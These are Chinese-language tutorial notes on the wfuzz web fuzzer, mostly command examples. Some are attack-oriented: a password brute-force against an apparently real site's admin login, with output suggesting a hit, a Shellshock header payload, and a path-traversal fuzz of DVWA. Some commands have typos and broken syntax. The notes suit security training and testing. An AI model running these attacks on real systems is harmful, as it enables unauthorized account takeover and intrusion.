116-wfuzz
wfuzz
Python语言编写的Fuzzer
- 功能多、速度快、灵活性高、可扩展
- 从所有入口向服务器提交数据( IP、域名、端口、方法、变量、头部…)
- 使用占位符标识注入点( FUZZ )
- 指定Payload进行替换提交数据
Payload模块(encoders/iterators/scripts/printers)
wfuzz -e payloads
wfuzz -z help --slice file payload详细信息
wfuzz -z range,1-254 -z file,a.txt --hc 404 http://1.1.1.FUZZ/FUZ2Z
-Z --conn-delay 3 --req-delay 3
wfuzz -z range,1-254 -z file,a.txt --hh BBB http://1.1.1.FUZZ{b}/FUZ2Z{a}
/usr/share/wordlists 23s root@kali 0.07 14:40:25 ❯ wfuzz -c -v -w ./SecLists/Passwords/Common-Credentials/10-million-password-list-top-10000.txt -d "user=admin&pw=FUZZ{a}" --hh BBB -u "http://www.c1moon.com/admin/index.php?action=login" /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ******************************************************** Target: http://www.c1moon.com/admin/index.php?action=login Total requests: 10000 ==================================================================================================================================================== ID C.Time Response Lines Word Chars Server Redirect Payload ==================================================================================================================================================== 000000001: 1.039s 200 33 L 100 W 1549 Ch Microsoft-IIS/8.5 "a" 000000002: 1.063s 302 1 L 3 W 87 Ch Microsoft-IIS/8.5 ./ "123456" ^C /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests... Total time: 0 Processed Requests: 141 Filtered Requests: 139 Requests/sec.: 0wfuzz -H “User- Agent: () { :;}; echo; echo XXX” --ss XXX -w cgi.txt http://a/FUZZ
结果过滤
- –hc / SC #响应码
- –hl / sl #响应Body行数
- –hw / SW #响应Body word数量
- –hh / sh #响应Body chars数量
- –hs / SS #响应Body正则匹配
–filter
wfuzz -c -v -z list,a-b-admin -z list,1-2-password -d "username=FUZZ&password=FUZ2Z&Login=Login" --filter "headers.response.Location='~index.php'" http://url/dvwa/login.php- http://wfuzz.readthedocs.io/en/latest/
URL参数
wfuzz -C -V -w /usr/share/wfuzz/wordlist/Injections/Traversal.txt -b
“security= low; PHPSESSID= 898d5fb4a2b85261f1dff1fca1d9b30c” --ss
‘root;x’ -u http://ip/dvwa/vulnerabilities/fi/?page=FUZZ
测试Cookie
wfuzz -z file,a.txt -b cookie =FUZZ - http://ip/
测试Head
wfuzz -z file,a.txt -H “User-Agent: IE99” http://ip/FUZZ
请求方法
wfuzz -z list,GET-HEAD-POST-TRACE-OPTIONS-DELETE-MOVE -X FUZZ ip
使用代理
wfuzz -Z file,a.txt -p ip:8080 http://ip/FUZZ
HTTP身份认证
wfuzz -Z list,user-pass --basic FUZZ:FUZ2Z http://ip/
递归深度
wfuzz -z file,a.txt -R 3 http://ip/FUZZ
速度控制
-t #线程(并发数)
-S #请求间隔
输出格式
wfuzz -f outfile,json -w a.txt http://ip/FUZZ
全局配置~/.wfuzz/wfuzz.ini
cancle_on_plugin_except= 1 #插件异常退出
concurrent plugins = 3 #并发插件上限
lookup_dirs= . #字典文件目录
encode_space = 1 #编码空格键
Iterators模块
wfuzz -e iterators
zip :字典配对 / chain :多字典单变量 / product :默认交叉
wfuzz -z list,a-b-c -z list,1-2-3 -m zip http://ip/FUZZ/FUZ2Z
Encoders模块
●wfuzz -z file,a.txt,md5 http://ip/FUZZ
Script模块
wfuzz --script= robots -z list,robots.txt http://ip/FUZZ
保存调用
wfuzz --script=robots -z list,a.txt --dump-recipe job1 http://ip/FUZZ
wfuzz --recipe job1
预过滤Payload
wfuzz -z list,1-2-1-2-a --slice “FUZZ|u0” http://1.1.1.1/FUZZ
wfuzz库
import wfuzz
a = wfuzz.fuzz(url= “http://ip/FUZZ”, hc=[404] payloads=[( file ,dict(fn="a.txt ))
for r in a:
print r
